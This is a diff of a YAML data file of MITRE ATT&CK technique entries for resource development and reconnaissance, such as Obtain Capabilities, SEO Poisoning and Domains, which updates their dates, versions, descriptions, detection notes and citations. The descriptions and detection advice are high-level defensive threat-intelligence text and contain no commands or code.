           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:47:46.409Z'
       name: Install Digital Certificate
       description: "Adversaries may install SSL/TLS certificates that can be used
         during targeting. SSL/TLS certificates are files that can be installed on
@@ -53865,8 +54527,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.002:
     technique:
@@ -53914,7 +54574,7 @@ resource-development:
         Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
 
         By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:22:13.578Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: DNS Server
       x_mitre_detection: |-
@@ -53930,7 +54590,6 @@ resource-development:
       - 'Domain Name: Passive DNS'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585:
     technique:
@@ -53989,54 +54648,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
-      type: attack-pattern
-      created: '2020-10-01T01:56:24.776Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588
-        url: https://attack.mitre.org/techniques/T1588
-      - source_name: NationsBuying
-        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
-          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
-        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
-      - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
-        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
-          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
-          Human Rights Defender. Retrieved December 12, 2016.'
-        source_name: PegasusCitizenLab
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: FireEyeSupplyChain
-        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
-          SunshopFireEye. Retrieved March 6, 2017.'
-        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.568Z'
       name: Obtain Capabilities
       description: |-
         Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -54047,22 +54662,66 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
       - 'Malware Repository: Malware Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+      created: '2020-10-01T01:56:24.776Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588
+        external_id: T1588
+      - source_name: PegasusCitizenLab
+        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+          Human Rights Defender. Retrieved December 12, 2016.'
+        url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+      - source_name: FireEyeSupplyChain
+        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+          SunshopFireEye. Retrieved March 6, 2017.'
+        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: NationsBuying
+        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1650:
     technique:
@@ -54125,37 +54784,38 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.007:
     technique:
-      modified: '2022-10-20T21:19:57.555Z'
+      modified: '2024-10-03T14:18:34.045Z'
       name: Serverless
       description: "Adversaries may compromise serverless cloud infrastructure, such
-        as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
-        By utilizing serverless infrastructure, adversaries can make it more difficult
-        to attribute infrastructure used during operations back to them. \n\nOnce
-        compromised, the serverless runtime environment can be leveraged to either
-        respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+        as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+        can be used during targeting. By utilizing serverless infrastructure, adversaries
+        can make it more difficult to attribute infrastructure used during operations
+        back to them. \n\nOnce compromised, the serverless runtime environment can
+        be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
         traffic to an adversary-owned command and control server.(Citation: BlackWater
-        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
-        by these functions will appear to come from subdomains of common cloud providers,
-        it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+        Apps Script Abuse 2021) As traffic generated by these functions will appear
+        to come from subdomains of common cloud providers, it may be difficult to
+        distinguish from ordinary traffic to these providers - making it easier to
+        [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
         Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
         Workers)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -54179,11 +54839,14 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.004:
     technique:
@@ -54241,17 +54904,18 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.006:
     technique:
-      modified: '2023-03-13T20:35:52.302Z'
+      modified: '2024-08-14T15:03:56.383Z'
       name: SEO Poisoning
       description: |-
         Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
 
         To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
 
+        In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
         Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
 
         SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -54259,7 +54923,7 @@ resource-development:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Vijay Lalwani
       - Will Thomas, Equinix Threat Analysis Center (ETAC)
       - Will Jolliffe
@@ -54273,7 +54937,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -54306,11 +54970,18 @@ resource-development:
         description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
           September 30, 2022.
         url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+      - source_name: Chexmarx-seo
+        description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+          the Star Ranking Game. Retrieved June 18, 2024.'
+        url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+      - source_name: Checkmarx-oss-seo
+        description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+          Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+        url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.003:
     technique:
@@ -54332,7 +55003,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:19:50.018Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -54350,47 +55021,10 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
-      type: attack-pattern
-      created: '2020-10-01T01:30:00.877Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1587
-        url: https://attack.mitre.org/techniques/T1587
-      - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
-        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
-          Units. Retrieved July 18, 2016.
-        source_name: Mandiant APT1
-      - source_name: Kaspersky Sofacy
-        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
-          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
-          December 10, 2015.
-        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
-      - source_name: Bitdefender StrongPity June 2020
-        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
-        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
-          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
-      - source_name: Talos Promethium June 2020
-        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
-        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
-          reach with StrongPity3 APT. Retrieved July 20, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:31:17.270Z'
       name: Develop Capabilities
       description: |-
         Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -54399,21 +55033,57 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
 
         Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+      created: '2020-10-01T01:30:00.877Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1587
+        external_id: T1587
+      - source_name: Kaspersky Sofacy
+        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+          December 10, 2015.
+        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Mandiant APT1
+        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+          Units. Retrieved July 18, 2016.
+        url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+      - source_name: Talos Promethium June 2020
+        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+          reach with StrongPity3 APT. Retrieved July 20, 2020.
+        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+      - source_name: Bitdefender StrongPity June 2020
+        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1588.005:
     technique:
@@ -54453,7 +55123,7 @@ resource-development:
         description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
           Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
           October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:14:01.255Z'
       name: Exploits
       description: |-
         Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -54472,15 +55142,13 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.001:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-24T15:10:40.270Z'
       name: Domains
       description: |-
-        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
 
         Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
 
@@ -54488,19 +55156,19 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Jeremy Galloway
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.3'
-      x_mitre_contributors:
-      - Jeremy Galloway
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -54534,55 +55202,64 @@ resource-development:
         url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 reconnaissance:
   T1592:
     technique:
-      x_mitre_platforms:
-      - PRE
+      modified: '2024-10-03T19:35:07.269Z'
+      name: Gather Victim Host Information
+      description: |-
+        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: reconnaissance
+      x_mitre_contributors:
+      - Sam Seabrook, Duke Energy
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Internet Scan: Response Content'
       type: attack-pattern
+      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
       created: '2020-10-02T16:39:33.966Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1592
         url: https://attack.mitre.org/techniques/T1592
+        external_id: T1592
       - source_name: ATT ScanBox
-        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+      - source_name: TrellixQakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved August 1, 2024.
